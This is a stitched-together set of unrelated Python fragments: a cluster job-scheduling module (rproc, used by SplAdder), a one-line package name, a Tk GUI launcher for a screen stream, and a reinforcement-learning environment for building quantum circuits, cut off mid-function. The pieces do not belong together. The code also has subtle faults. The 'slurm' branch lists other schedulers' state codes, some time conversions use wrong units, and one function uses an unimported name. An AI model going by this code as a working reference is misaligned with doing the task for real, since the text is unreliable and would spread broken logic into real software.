    """Return 1 while *status* denotes a live job, 0 for a dead/suspended state."""
    # ret = check_status(status)
    global SCHEDULER
    # SCHED_STATUS_LIST: states meaning the job is no longer runnable
    if SCHEDULER == 'torque':
        dead_states = ['E', 'C', 'S']
    elif SCHEDULER == 'sge':
        dead_states = ['d', 'E', 't', 's', 'S']
    elif SCHEDULER == 'lsf':
        dead_states = ['USUSP', 'SSUSP', 'DONE', 'EXIT', 'ZOMBI']
    elif SCHEDULER == 'slurm':
        dead_states = ['t', 'Eqw', 'dt', 'dr']
    return 0 if status in dead_states else 1
def rproc_submit_and_wait(jobinfo, finish_frac, jobtimeout):
    """Poll the given jobs until at least *finish_frac* of them are finished.

    Jobs exceeding *jobtimeout* minutes since submission are killed and
    resubmitted.
    jobinfo     -- list of job descriptors; only entries with created == 1 count
    finish_frac -- fraction (0..1] of jobs that must finish before returning
    jobtimeout  -- per-job timeout in minutes
    """
    # [jobinfo,frac_finished]=rproc_submit_and_wait(jobinfo, finish_frac, jobtimeout)
    num_jobs = 0
    for i in range(len(jobinfo)):
        if jobinfo[i].created == 1:
            num_jobs += 1
    # BUG FIX: with zero submitted jobs the loop condition divided by zero
    if num_jobs == 0:
        print('')
        return
    num_finished = 0
    while (num_finished / float(num_jobs) < finish_frac):
        num_finished = 0
        for id in range(len(jobinfo)):
            if rproc_finished(jobinfo[id]):
                num_finished += 1
            else:
                if jobinfo[id].created == 1:
                    if rproc_time_since_submission(jobinfo[id]) > jobtimeout:
                        print('WARNING: job took longer than timeout. Killing and restarting it', file=sys.stderr)
                        rproc_kill(jobinfo[id])
                        jobinfo[id] = rproc_resubmit(jobinfo[id], 1)
        print('waiting for jobs to finish: %i/%i \r' % (num_finished, num_jobs))
        if (num_finished / float(num_jobs) < finish_frac):
            time.sleep(10)
    print('')
def rproc_submit_batch(jobinfo, blocksize):
    """Pack jobs into meta-jobs of roughly balanced runtime and submit each
    group as one cluster job running rproc_submit_batch_helper.

    jobinfo   -- list of job descriptors (with .time in minutes, .Mem in MB)
    blocksize -- maximum number of sub-jobs per meta job
    Returns (jobinfo, meta_jobinfo) with per-job log/jobid fields updated.
    """
    # [jobinfo, meta_jobinfo] = rproc_submit_many(jobinfo, blocksize)
    meta_jobinfo = rproc_empty(0)
    time_per_submission = 1.0/60 # 1 seconds
    num_meta = int(math.ceil(len(jobinfo) / float(blocksize)))
    time_per_metajob = [0 for i in range(num_meta)]
    metablockassignment = [0 for i in range(len(jobinfo))]
    # greedy balancing: assign the longest jobs first to the least-loaded bin
    s_idx = sorted(list(range(len(jobinfo))), key=(lambda x: -jobinfo[x].time))
    for i in s_idx:  # BUG FIX: loop used undefined name 'sidx'
        if len(time_per_metajob) > 1:
            # BUG FIX: 'length' -> 'len' (NameError)
            step = (time_per_submission * len(time_per_metajob)) / (len(time_per_metajob) - 1)
        else:
            step = 0.0  # single meta job: no spread needed (avoids div by zero)
        span = [-time_per_submission * len(time_per_metajob) + (ii * step) for ii in range(len(time_per_metajob))]
        span = [span[x] + time_per_metajob[x] for x in range(len(span))]
        idx = span.index(min(span))
        metablockassignment[i] = idx
        time_per_metajob[idx] += jobinfo[i].time
    meta_i = 1
    for i in range(num_meta):
        idx = [ii for ii in range(len(metablockassignment)) if metablockassignment[ii] == i]
        if len(idx) == 0:
            continue
        for j in range(len(idx)):
            options = jobinfo[idx[j]].options
            options.submit_now = 0
            jobinfo[idx[j]] = rproc(jobinfo[idx[j]].ProcName, jobinfo[idx[j]].P1, jobinfo[idx[j]].Mem, options, jobinfo[idx[j]].time, jobinfo[idx[j]].callfile, resubmission=True)
        # BUG FIX: a Python list cannot be indexed with a list of indices
        jobinfo_ = [jobinfo[ii] for ii in idx]
        options = jobinfo[idx[0]].options
        options.submit_now = 1
        options.verbosity = 1
        memory_MB = max([x.Mem for x in jobinfo_])
        minutes = sum([int(x.time) for x in jobinfo_])
        print('submitting job %i/%i (%i subjobs) \r' % (i, num_meta, len(idx)))
        # NOTE(review): indexed assignment assumes rproc_empty() returns an
        # indexable container with a slot at meta_i — confirm its semantics
        meta_jobinfo[meta_i] = rproc('rproc_submit_batch_helper', jobinfo_, memory_MB, options, minutes)
        for j in range(len(idx)):
            jobinfo[idx[j]].log_fname = meta_jobinfo[meta_i].log_fname
            jobinfo[idx[j]].jobid = meta_jobinfo[meta_i].jobid
            jobinfo[idx[j]].submission_time = meta_jobinfo[meta_i].submission_time
        meta_i += 1
    print('')
    return (jobinfo, meta_jobinfo)
def rproc_submit_batch_helper(parameters):
    """Worker entry point of a meta job: run every wrapped sub-job in sequence,
    then remove the per-job pickle/script/data files.

    parameters -- list of job descriptors carrying mat_fname and data_fname.
    Returns 0 (MATLAB-style success code).
    """
    # x = rproc_submit_batch_helper(parameters)
    print('Executing a batch of %i jobs in a super-job' % len(parameters))
    pp = os.getcwd()
    for i in range(len(parameters)):
        os.chdir(pp)  # a sub-job may chdir; restore before starting the next
        print('starting job %i in file %s' %(i, parameters[i].mat_fname))
        print('=========================================')
        try:
            start_proc(parameters[i].mat_fname, parameters[i].data_fname, 0)
        except Exception:  # BUG FIX: bare except also swallowed SystemExit/KeyboardInterrupt
            print('execution of start_proc failed', file=sys.stderr)
    # remove files
    for i in range(len(parameters)):
        fname = parameters[i].mat_fname
        os.remove(fname) # mat file
        # BUG FIX: str.strip('pickle') strips a *character set*, corrupting
        # names that begin/end with any of 'p i c k l e'; replace the suffix
        if fname.endswith('pickle'):
            os.remove('%spy' % fname[:-len('pickle')]) # m file
        else:
            os.remove('%spy' % fname.strip('pickle')) # m file (legacy fallback)
        fname = parameters[i].data_fname
        os.remove(fname) # data file
    return 0
def rproc_time_since_submission(jobinfo):
    """Return the number of minutes elapsed since the job was submitted."""
    elapsed_seconds = time.time() - jobinfo.submission_time
    return elapsed_seconds / 60
def rproc_wait(jobinfo, pausetime=120, frac_finished=1.0, resub_on=1, verbosity=2):
    """Block until a fraction of the given jobs has finished, resubmitting
    crashed jobs according to *resub_on*.

    jobinfo       -- job descriptor or list of descriptors
    pausetime     -- seconds slept between polling rounds
    frac_finished -- fraction of jobs that must be done before returning
    resub_on      -- 1: always resubmit crashes, -1: resubmit within the
                     per-job retry budget, 0: never resubmit
    verbosity     -- 0..2, amount of progress output
    Returns (jobinfo, num_crashed) early if the scheduler poll was interrupted
    (status == -1); on normal completion it falls off the end (returns None).
    """
    # [jobinfo, num_crashed] = rproc_wait(jobinfo, pausetime, frac_finished, resub_on, verbosity)
    global rproc_wait_jobinfo
    rproc_wait_jobinfo = jobinfo
    if resub_on == 1:
        print('\n\ncrashed jobs will be resubmitted by rproc_wait')
    elif resub_on == -1:
        print('\n\ncrashed jobs may be resubmitted by rproc_wait')
    else:
        print('\n\ncrashed jobs will not be resubmitted by rproc_wait')
    if not isinstance(jobinfo, list):
        jobinfo = [jobinfo]
    num_jobs = 0
    num_crashed = 0
    # count only jobs that were actually submitted
    for i in range(len(jobinfo)):
        if jobinfo[i].created == 1:
            if jobinfo[i].time is None:
                print('WARNING: job created but not submitted yet. ignoring', file=sys.stderr)
                jobinfo[i].created = 0
            else:
                num_jobs += 1
    num_finished = 0
    first_iter = True
    while (num_finished < num_jobs * frac_finished) or (num_crashed > 0):
        if not first_iter:
            time.sleep(pausetime)
        first_iter = False
        num_finished = 0
        num_crashed = 0
        crashed_files = 'log files of crashed jobs:'
        for id in range(len(jobinfo)):
            cur_finished = rproc_finished(jobinfo[id])
            (still_running, qstat_line, start_time, status) = rproc_still_running(jobinfo[id])
            if status == -1:
                # user interrupted the scheduler poll -> stop waiting
                return (jobinfo, num_crashed)
            jobinfo[id].start_time = start_time
            if cur_finished:
                num_finished += 1
            elif not still_running:
                # vanished from the queue without a result file -> crashed
                num_finished += 1
                num_crashed += 1
                crashed_files = '%s\n%s' % (crashed_files, jobinfo[id].log_fname)
                if jobinfo[id].crashed_time is None:
                    jobinfo[id].crashed_time = time.time()
                elif 24 * 60 * (time.time() - jobinfo[id].crashed_time) > max(3 * (pausetime/60.0), 0.1) and (resub_on == 1 or (resub_on == -1 and jobinfo[id].resubmit >= jobinfo[id].retries + 1)):
                    # NOTE(review): time.time() differences are in seconds, so
                    # the 24 * 60 factor does not convert to minutes/days as
                    # written — confirm the intended unit of this grace period.
                    if resub_on == 1:
                        (reachedlimit, jobwalltime) = rproc_reached_timelimit(jobinfo[id])
                        if reachedlimit: # check whether the job has been killed because it reached the time limit
                            if verbosity >= 1:
                                print('job has been canceled because it used %1.0fs, but time limit was %1.0fs walltime.\nhence, we increase the time limit to %1.0fs.\n' % (jobwalltime, jobinfo[id].time * 60, max(jobinfo[id].time, jobwalltime) * 2))
                            jobinfo[id].time = max(jobinfo[id].time, jobwalltime / 60) * 2
                    elif resub_on == -1:
                        # move to the next entry of the resubmission budgets
                        jobinfo[id].time = jobinfo[id].time_req_resubmit[min(jobinfo[id].retries + 1, len(jobinfo[id].time_req_resubmit) - 1)]
                        jobinfo[id].Mem = jobinfo[id].mem_req_resubmit[min(jobinfo[id].retries + 1, len(jobinfo[id].mem_req_resubmit) - 1)]
                    jobinfo[id].start_time = []
                    if verbosity >= 1:
                        print('resubmitting job (%i) with new time and memory limitations: %iMb and %i minutes (retry #%i)\n' % (jobinfo[id].jobid, jobinfo[id].Mem, jobinfo[id].time, jobinfo[id].retries + 1))
                    if verbosity >= 2:
                        print('log file of previous attempt %s\n' % jobinfo[id].log_fname)
                    jobinfo[id] = rproc_resubmit(jobinfo[id])
                    jobinfo[id].crashed_time = None
                    num_finished -= 1
            else:
                if verbosity >= 2:
                    print('%s' % qstat_line)
                ### hard_time_limit in minutes
                # NOTE(review): start_time may be a float (time.time()) once the
                # job started, in which case len() would raise — confirm type.
                if len(jobinfo[id].start_time) > 0 and 24 * 60 * (time.time() - jobinfo[id].start_time) > jobinfo[id].hard_time_limit:
                    print('delete job (%i) because hard time limit (%imin) was reached\n' % (jobinfo[id].jobid, jobinfo[id].hard_time_limit))
                    #SCHED_DELETE_JOB
                    subprocess.call(['qdel', str(jobinfo[id].jobid)])
        if verbosity >= 1:
            print('\n%i of %i jobs finished (%i of them crashed) \n' % (num_finished, num_jobs, num_crashed))
        if verbosity >= 2:
            if len(crashed_files.strip().split('\n')) > 0:
                print('%s\n' % crashed_files)
        if resub_on == 0 and num_finished == num_jobs * frac_finished:
            break
        if resub_on == -1 and num_finished == num_jobs * frac_finished:
            # stop only once every unfinished job has exhausted its retries
            all_tried = True
            for i in range(len(jobinfo)):
                fin = rproc_finished(jobinfo[i])
                if (jobinfo[i].resubmit >= jobinfo[i].retries + 1) and not fin:
                    all_tried = False
            if all_tried:
                break
        time.sleep(1)
def start_proc(fname, data_fname, rm_flag=True):
    """Worker-side entry point: load a pickled call description, recreate the
    caller's import environment, run the target function, and pickle its
    result next to *fname*.

    fname      -- pickle holding (ProcName, dirctry, options, callfile)
    data_fname -- pickle holding the single argument P1 (None for no-arg calls)
    rm_flag    -- remove input/script files on success (overridable through
                  options['rm_flag'])
    """
    # start_proc(fname, data_fname, rm_flag)
    global THIS_IS_A_RPROC_PROCESS
    THIS_IS_A_RPROC_PROCESS = True
    ### load and create environment
    (ProcName, dirctry, options, callfile) = pickle.load(open(fname, 'rb'))
    os.chdir(dirctry)
    print('%s on %s started (in %s; from %s %s)' % (ProcName, os.environ['HOSTNAME'], dirctry, fname, data_fname))
    # NOTE(review): '%H:%S' lacks minutes — probably meant '%H:%M:%S'
    print('### job started %s' % time.strftime('%Y-%m-%d %H:%S'))
    # prune / extend sys.path as requested by the submitting process
    if 'rmpaths' in options:
        for i in range(len(options['rmpaths'])):
            print('removing path %s' % options['rmpaths'][i])
            while options['rmpaths'][i] in sys.path:
                r_idx = sys.path.index(options['rmpaths'][i])
                del sys.path[r_idx]
    if 'addpaths' in options:
        for i in range(len(options['addpaths'])):
            if not options['addpaths'][i] in sys.path:
                print('adding path %s' % options['addpaths'][i])
                sys.path.append(options['addpaths'][i])
    if 'rm_flag' in options:
        rm_flag = options['rm_flag']
    ### create environment
    # mirror the caller's imports in this process (uses the deprecated 'imp'
    # module; packages are imported level by level, dotted name by dotted name)
    import_list = []
    for mod in options['imports']:
        module = options['imports'][mod]
        if module[1] == 'builtin':
            if imp.is_builtin(module[0]) == 1:
                exec('import %s' % module[0])
        else:
            mod_sl = module[0].split('.')
            subpaths = get_subpaths(os.path.dirname(module[1]).split('/'))
            imported = True
            for m in range(len(mod_sl)):
                #exec('exists = \'%s\' in globals()' % '.'.join(mod_sl[:m+1]))
                exists = '.'.join(mod_sl[:m+1]) in globals()
                if not exists and not '.'.join(mod_sl[:m+1]) in import_list and not 'rproc' in mod_sl[:m+1]:
                    try:
                        (f, fn, des) = imp.find_module(mod_sl[m], subpaths)
                        try:
                            ### TODO: This is a bit hacky, but the only way that linalg can be loaded right now
                            if fn.endswith('scipy'):
                                import scipy
                                import_list.append('scipy')
                                continue
                            exec('%s = imp.load_module(\'%s\', f, fn, des)' % ('.'.join(mod_sl[:m+1]), '.'.join(mod_sl[:m+1])))
                            import_list.append('.'.join(mod_sl[:m+1]))
                        except:
                            imported = False
                        finally:
                            if f is not None:
                                f.close()
                    except ImportError:
                        print('Module %s could not be found' % '.'.join(mod_sl[:m+1]), file=sys.stderr)
                        imported = False
                else:
                    imported = False
            if mod != module[0] and imported:
                # the caller used an alias for the module -> recreate it here
                exec('%s = %s' % (mod, module[0]))
    #sys.path = [dirctry] + sys.path
    ### load data into environment
    P1 = pickle.load(open(data_fname, 'rb'))
    retval1 = []
    retval2 = []
    try:
        # import the target function, then call it with P1 (if provided)
        if callfile[0] == '__main__':
            sys.path.append(os.getcwd())
            exec('from %s import %s' % (re.sub(r'.py$', '', callfile[1]), ProcName))
        else:
            exec('from %s import %s' % (callfile[0], ProcName))
        if not P1 is None:
            retval = eval('%s(P1)' % ProcName)
        else:
            retval = eval('%s()' % ProcName)
        # normalize to (retval1, retval2), mimicking MATLAB's two outputs
        if retval is None:
            pass
        elif isinstance(retval, tuple):
            retval1 = retval[0]
            retval2 = retval[1]
        else:
            retval1 = retval
        if not ('no_result_file' in options and options['no_result_file']):
            print('saving results to %s_result.pickle' % os.path.splitext(fname)[0])
            pickle.dump((retval1, retval2), open('%s_result.pickle' % os.path.splitext(fname)[0], 'wb'), -1)
    except (NameError, TypeError) as e:
        print('execution of %s failed' % ProcName, file=sys.stderr)
        print('%s' % str(e), file=sys.stderr)
        global MATLAB_RETURN_VALUE
        MATLAB_RETURN_VALUE = -1
        rm_flag = False
    except RprocRerun as e:
        # if we rerun, then we should not cleanup
        print('job is marked for rerunning. exiting without finished computations', file=sys.stderr)
    else:
        if rm_flag:
            os.remove(fname) # data file
            # NOTE(review): strip('pickle') strips a character set, not the
            # suffix — fragile for names starting/ending in those letters
            os.remove('%ssh' % fname.strip('pickle')) # script file
    print('### job finished %s' % time.strftime('%Y-%m-%d %H:%S'))
def split_walltime(time_str):
    """ Transform wallclock time string into integer of seconds
    Arguments:
    time_str -- time stamp of the format [days:[hours:[minutes:]]]seconds
    Return values:
    seconds -- integer containing number of seconds expressed by time_str
    """
    # factors for seconds, minutes, hours, days (least significant first)
    factors = [1, 60, 3600, 86400]
    seconds = 0
    sl = time_str.split(':')
    # i walks the fields left to right, j is the significance of field i
    for i, j in enumerate(range(len(sl) - 1, -1, -1)):
        # BUG FIX: the bound must be checked on j (the factors index), not i;
        # with >4 fields the old check passed and factors[j] raised IndexError
        if j < len(factors):
            seconds += (int(sl[i]) * factors[j])
        else:
            print('WARNING: walltime computation exceeds max value', file=sys.stderr)
    return seconds
def get_subpaths(sl):
    """Return the '/'-joined ancestor paths of the split path *sl*, longest
    first, down to (but excluding) the single leading component."""
    paths = []
    for depth in range(len(sl) - 1):
        paths.append('/'.join(sl[:len(sl) - depth]))
    return paths
def spladder_pyproc(options):
    """SplAdder entry point: select the scheduler backend, then run the
    pickled procedure described by options.proc with data options.data."""
    _set_scheduler()
    start_proc(options.proc, options.data)
if __name__ == "__main__":
    # invoked directly on a worker node:
    # argv[1] = pickled call description, argv[2] = pickled data file
    _set_scheduler()
    start_proc(sys.argv[1], sys.argv[2])
|
name = "connect4"
|
#!/usr/bin/env python
# coding: utf-8
from ide import CropIDE
from minicap import Stream
from queue import Queue
import logutils
import logging
# module-level logger for the tk GUI frontend
log = logutils.getLogger('tkgui')
log.setLevel(logging.DEBUG)
def main(serial=None, scale=0.5):
    """Launch the SmartRecord GUI fed by a minicap stream on 127.0.0.1:1313.

    serial -- unused (kept for the historical u2 device hookup)
    scale  -- only logged; the GUI is created with its default ratio
    """
    log.debug("gui starting(scale: {}) ...".format(scale))
    frame_queue = Queue()
    stream = Stream.getBuilder(ip='127.0.0.1', port=1313, queue=frame_queue)
    stream.run()
    gui = CropIDE(title='SmartRecord', picture=frame_queue)
    gui.mainloop()
if __name__ == '__main__':
    # default entry point: start the live-stream GUI
    main()
def test():
    """Manual smoke test: display a static screenshot in the IDE.

    NOTE(review): 'Image' (PIL) has no visible import in this module —
    calling this as shown would raise NameError; confirm the import upstream.
    """
    gui = CropIDE('AirtestX IDE')
    image = Image.open('screen.png')
    gui.draw_image(image)
    # gui.refresh_screen()
    # gui.draw_point(100, 100)
    gui.mainloop()
if __name__ == '__main__':
    # NOTE(review): duplicate __main__ guard — the guard above already calls
    # main() and blocks in its mainloop, so this branch is normally unreached.
    # test()
    main(None)
|
import torch
from qulacs import QuantumCircuit
from qulacs.gate import CNOT, RX, RY, RZ
from utils import *
from sys import stdout
from itertools import product
import scipy
import VQE as vc
import os
import numpy as np
import random
import copy
import curricula
try:
from qulacs import QuantumStateGpu as QuantumState
except ImportError:
from qulacs import QuantumState
class CircuitEnv():
    """RL environment that incrementally builds a parameterized quantum
    circuit (CNOTs + single-qubit rotations) to minimize the energy of a
    LiH Hamiltonian loaded from mol_data/.

    State: torch tensor of shape (5, num_layers); row semantics in reset().
    Action: 4-vector interpreted in step().
    Reward: selected by conf['env']['fn_type'], see reward_fn().
    """
    def __init__(self, conf, device):
        # --- problem / environment configuration ---
        self.num_qubits = conf['env']['num_qubits']
        self.num_layers = conf['env']['num_layers']
        self.ham_mapping = conf['problem']['mapping']
        self.geometry = conf['problem']['geometry'].replace(" ", "_")
        self.fake_min_energy = conf['env']['fake_min_energy'] if "fake_min_energy" in conf['env'].keys() else None
        self.fn_type = conf['env']['fn_type']
        # If you want to run agent from scratch without *any* curriculum just use the setting with
        # normal curriculum and set config[episodes] = [1000000]
        self.curriculum_dict = {}
        __ham = np.load(f"mol_data/LiH_{self.num_qubits}q_geom_{self.geometry}_{self.ham_mapping}.npz")
        hamiltonian, eigvals, energy_shift = __ham['hamiltonian'], __ham['eigvals'], __ham['energy_shift']
        min_eig = conf['env']['fake_min_energy'] if "fake_min_energy" in conf['env'].keys() else min(eigvals) + energy_shift
        # curriculum keyed by bond distance (last 3 chars of the geometry string)
        self.curriculum_dict[self.geometry[-3:]] = curricula.__dict__[conf['env']['curriculum_type']](conf['env'], target_energy=min_eig)
        self.device = device
        self.ket = QuantumState(self.num_qubits)
        self.done_threshold = conf['env']['accept_err']
        stdout.flush()
        self.state_size = 5*self.num_layers
        self.actual_layer = -1  # index of the last non-empty layer (-1 = empty circuit)
        self.prev_energy = None
        self.energy = 0
        self.action_size = (self.num_qubits*(self.num_qubits+2))
        # --- optional classical angle optimization performed inside step() ---
        if 'non_local_opt' in conf.keys():
            self.global_iters = conf['non_local_opt']['global_iters']
            self.optim_method = conf['non_local_opt']["method"]
            if conf['non_local_opt']["method"] in ["Rotosolve_local_end", "Rotosolve_local_end_only_rot", "scipy_local_end"]:
                self.local_opt_size = conf['non_local_opt']["local_size"]
            if "optim_alg" in conf['non_local_opt'].keys():
                self.optim_alg = conf['non_local_opt']["optim_alg"]
        else:
            self.global_iters = 0
            self.optim_method = None
    def step(self, action, train_flag = True) :
        """
        Action is performed on the first empty layer.
        Variable 'actual_layer' points last non-empty layer.
        Returns (flattened next state, reward tensor, done flag).
        """
        next_state = self.state.clone()
        self.actual_layer += 1
        """
        First two elements of the 'action' vector describes position of the CNOT gate.
        Position of rotation gate and its axis are described by action[2] and action[3].
        When action[0] == num_qubits, then there is no CNOT gate.
        When action[2] == num_qubits, then there is no Rotation gate.
        """
        next_state[0][self.actual_layer] = action[0]
        # target qubit = control + offset, wrapped around the register
        next_state[1][self.actual_layer] = (action[0] + action[1]) % self.num_qubits
        ## state[2] corresponds to number of qubit for rotation gate
        next_state[2][self.actual_layer] = action[2]
        next_state[3][self.actual_layer] = action[3]
        next_state[4][self.actual_layer] = torch.zeros(1)
        self.state = next_state.clone()
        # if rotation gate is present, then run the rotosolve
        if next_state[2][self.actual_layer] != self.num_qubits:
            thetas = self.get_angles(self.actual_layer)
            next_state[-1] = thetas
            if self.optim_method == "Rotosolve_local_end_only_rot":
                # re-optimize only the last local_opt_size rotation angles
                thetas_to_optim = min(next_state[-1][next_state[2]!=self.num_qubits].size()[0],self.local_opt_size)
                angle_indices = -np.arange(thetas_to_optim, 0, -1)
                thetas = self.global_roto(angle_indices)
                next_state[-1] = thetas
        self.state = next_state.clone()
        # optional non-local optimization of the circuit angles
        if self.optim_method == "Rotosolve_local_end":
            thetas_to_optim = min(next_state[-1][next_state[2]!=self.num_qubits].size()[0],self.local_opt_size)
            angle_indices = -np.arange(thetas_to_optim, 0, -1)
            thetas = self.global_roto(angle_indices)
            next_state[-1] = thetas
        elif self.optim_method in ["scipy_local_end"]:
            nb_of_thetas = next_state[-1][next_state[2]!=self.num_qubits].size()[0] ## number of all thetas
            thetas_to_optim = min(nb_of_thetas, self.local_opt_size) ## number of thetas which we want to optimize
            angle_indices = np.arange(nb_of_thetas - thetas_to_optim, nb_of_thetas) ## in COBYLA case we need them in ascending order and positive (not [-1,-2,-,3])
            # print(angle_indices)
            # print(next_state[-1][next_state[2]!=self.num_qubits])
            if nb_of_thetas != 0:
                thetas = self.scipy_optim(self.optim_alg, angle_indices)
                next_state[-1] = thetas
        elif self.optim_method == "Rotosolve_each_step":
            thetas = self.global_roto()
            next_state[-1] = thetas
        elif self.optim_method in ["scipy_each_step"]:
            if next_state[-1][next_state[2]!=self.num_qubits].size()[0] != 0:
                thetas = self.scipy_optim(self.optim_alg)
                next_state[-1] = thetas
        self.state = next_state.clone()
        energy = self.get_energy()
        self.energy = energy
        # track the best energy seen so far for the curriculum
        if energy < self.curriculum.lowest_energy and train_flag:
            self.curriculum.lowest_energy = copy.copy(energy)
        self.error = float(abs(self.min_eig-energy))
        rwd = self.reward_fn(energy)
        self.prev_energy = np.copy(energy)
        energy_done = int(self.error < self.done_threshold)
        layers_done = self.actual_layer == (self.num_layers-1)
        done = int(energy_done or layers_done)
        if done:
            # episode over: let the curriculum adapt the acceptance threshold
            self.curriculum.update_threshold(energy_done=energy_done)
            self.done_threshold = self.curriculum.get_current_threshold()
            self.curriculum_dict[str(self.current_bond_distance)] = copy.deepcopy(self.curriculum)
        return next_state.view(-1).to(self.device), torch.tensor(rwd, dtype=torch.float32, device=self.device), done
    def reset(self):
        """
        Returns randomly initialized state of environment.
        State is a torch Tensor of size (5 x number of layers)
        1st row [0, num of qubits-1] - denotes qubit with control gate in each layer
        2nd row [0, num of qubits-1] - denotes qubit with not gate in each layer
        3rd, 4th & 5th row - rotation qubit, rotation axis, angle
        !!! When some position in 1st or 3rd row has value 'num_qubits',
        then this means empty slot, gate does not exist (we do not
        append it in circuit creator)
        """
        ## state_per_layer: (Control_qubit, NOT_qubit, R_qubit, R_axis, R_angle)
        controls = self.num_qubits * torch.ones(self.num_layers)
        nots = torch.zeros(self.num_layers)
        rotats = self.num_qubits * torch.ones(self.num_layers)
        generatos = torch.zeros(self.num_layers)
        angles = torch.zeros(self.num_layers)
        state = torch.stack((controls.float(),
                             nots.float(),
                             rotats.float(),
                             generatos.float(),
                             angles))
        self.state = state
        self.make_circuit(state)
        self.actual_layer = -1
        # reload the Hamiltonian for the current bond distance and restore
        # the matching curriculum snapshot
        self.current_bond_distance = self.geometry[-3:]
        self.curriculum = copy.deepcopy(self.curriculum_dict[str(self.current_bond_distance)])
        self.done_threshold = copy.deepcopy(self.curriculum.get_current_threshold())
        self.geometry = self.geometry[:-3] + str(self.current_bond_distance)
        __ham = np.load(f"mol_data/LiH_{self.num_qubits}q_geom_{self.geometry}_{self.ham_mapping}.npz")
        self.hamiltonian, eigvals, self.energy_shift = __ham['hamiltonian'], __ham['eigvals'], __ham['energy_shift']
        self.min_eig = self.fake_min_energy if self.fake_min_energy is not None else min(eigvals) + self.energy_shift
        self.max_eig = max(eigvals)+self.energy_shift
        self.prev_energy = self.get_energy(state)
        return state.view(-1).to(self.device)
    def make_circuit(self, thetas=None):
        """
        based on the angle of first rotation gate we decide if any rotation at
        a given qubit is present i.e.
        if thetas[0, i] == 0 then there is no rotation gate on the Control quibt
        if thetas[1, i] == 0 then there is no rotation gate on the NOT quibt
        CNOT gate have priority over rotations when both will be present in the given slot
        """
        state = self.state.clone()
        if thetas is None:
            thetas = state[-1]
        circuit = QuantumCircuit(self.num_qubits)
        for i in range(self.num_layers):
            # slot encodes either a CNOT (row 0) or a rotation (row 2);
            # value == num_qubits marks an empty slot
            if state[0][i].item() != self.num_qubits:
                circuit.add_gate(CNOT(int(state[0][i].item()),
                                      int(state[1][i].item())))
            elif state[2][i].item() != self.num_qubits:
                circuit.add_gate(self.R_gate(int(state[2][i].item()),
                                             int(state[3][i].item()),
                                             thetas[i].item()))
        assert circuit.get_gate_count() <= self.num_layers, "Wrong circuit construction, too many gates!!!"
        return circuit
    def R_gate(self, qubit, axis, angle):
        """Map an axis code (1/'x', 2/'y', 3/'z') to a qulacs rotation gate."""
        if axis == 'X' or axis == 'x' or axis == 1:
            return RX(qubit, angle)
        elif axis == 'Y' or axis == 'y' or axis == 2:
            return RY(qubit, angle)
        elif axis == 'Z' or axis == 'z' or axis == 3:
            return RZ(qubit, angle)
        else:
            print("Wrong gate")
            return 1
    def get_energy(self, thetas=None):
        """Return <psi|H|psi> + energy_shift for the current circuit state."""
        circ = self.make_circuit(thetas)
        self.ket.set_zero_state()
        circ.update_quantum_state(self.ket)
        v = self.ket.get_vector()
        return np.real(np.vdot(v,np.dot(self.hamiltonian,v)))+ self.energy_shift
        # return self.observable.get_expectation_value(self.ket) + self.energy_shift
    def get_ket(self, thetas=None):
        """Return the state vector as a (1, 2*dim) float tensor [Re | Im]."""
        state = self.state.clone()
        circ = self.make_circuit(thetas)
        self.ket.set_zero_state()
        circ.update_quantum_state(self.ket)
        v = self.ket.get_vector()
        v_real = torch.tensor(np.real(v),device=self.device,dtype=torch.float)
        v_imag = torch.tensor(np.imag(v),device=self.device,dtype=torch.float)
        return torch.cat((v_real,v_imag)).view(1,-1)
    def get_angles(self, update_idx):
        """Rotosolve a single angle (index update_idx) analytically and return
        the full angle row with that entry replaced by its optimum."""
        state = self.state.clone()
        thetas = state[-1]
        thetas[update_idx] = 0.0
        theta1, theta2, theta3 = thetas.clone(), thetas.clone(), thetas.clone()
        theta1[update_idx] -= np.pi/2
        theta3[update_idx] += np.pi/2
        e1 = self.get_energy(theta1)
        e2 = self.get_energy(theta2)
        e3 = self.get_energy(theta3)
        ## Energy lanscape is of the form A \sin( \theta + B) + C
        C = 0.5*(e1+e3)
        B = np.arctan2((e2-C), (e3-C))
        thetas[update_idx] = -B-np.pi/2
        return thetas
    def global_roto(self, which_angles=[]):
        """Rotosolve sweep over the selected angle indices (all by default),
        repeated global_iters times; returns the updated angle row.
        NOTE(review): mutable default argument — safe only because it is
        never mutated here."""
        state = self.state.clone()
        thetas = state[-1][state[2]!=self.num_qubits]
        qulacs_inst = vc.Parametric_Circuit(n_qubits=self.num_qubits)
        param_circuit = qulacs_inst.construct_ansatz(state)
        # print("DEPTH",param_circuit.calculate_depth())
        arguments = (self.hamiltonian, param_circuit, self.num_qubits, self.energy_shift)
        if not list(which_angles):
            which_angles = np.arange(len(thetas))
        for j in range(self.global_iters):
            for i in which_angles:
                theta1, theta2, theta3 = thetas.clone(), thetas.clone(), thetas.clone()
                theta1[i] -= np.pi/2
                theta3[i] += np.pi/2
                e1 = vc.get_energy_qulacs(theta1,*arguments)
                e2 = vc.get_energy_qulacs(theta2,*arguments)
                e3 = vc.get_energy_qulacs(theta3,*arguments)
                ## Energy lanscape is of the form A \sin( \theta + B) + C
                C = 0.5*(e1+e3)
                B = np.arctan2((e2-C), (e3-C)) - theta2[i]
                thetas[i] = -B-np.pi/2
        state[-1][state[2]!=self.num_qubits] = thetas
        return state[-1]
    def scipy_optim(self, method, which_angles=[]):
        """Optimize the circuit angles (optionally a subset) with
        scipy.optimize.minimize using *method*; returns the updated angle row.
        NOTE(review): mutable default argument — never mutated here."""
        state = self.state.clone()
        thetas = state[-1][state[2]!=self.num_qubits]
        qulacs_inst = vc.Parametric_Circuit(n_qubits=self.num_qubits)
        qulacs_circuit = qulacs_inst.construct_ansatz(state)
        x0 = np.asarray(thetas.cpu().detach())
        if list(which_angles):
            # print(which_angles)
            # print(x0)
            result_min_qulacs = scipy.optimize.minimize(vc.get_energy_qulacs, x0=x0[which_angles],
                                                        args=(self.hamiltonian,
                                                              qulacs_circuit,
                                                              self.num_qubits,
                                                              self.energy_shift,
                                                              which_angles),
                                                        method=method,
                                                        options={'maxiter':self.global_iters})
            # print(result_min_qulacs)
            x0[which_angles] = result_min_qulacs['x']
            state[-1][state[2]!=self.num_qubits] = torch.tensor(x0, dtype=torch.float)
        else:
            result_min_qulacs = scipy.optimize.minimize(vc.get_energy_qulacs, x0=x0,
                                                        args=(self.hamiltonian,
                                                              qulacs_circuit,
                                                              self.num_qubits,
                                                              self.energy_shift),
                                                        method=method,
                                                        options={'maxiter':self.global_iters})
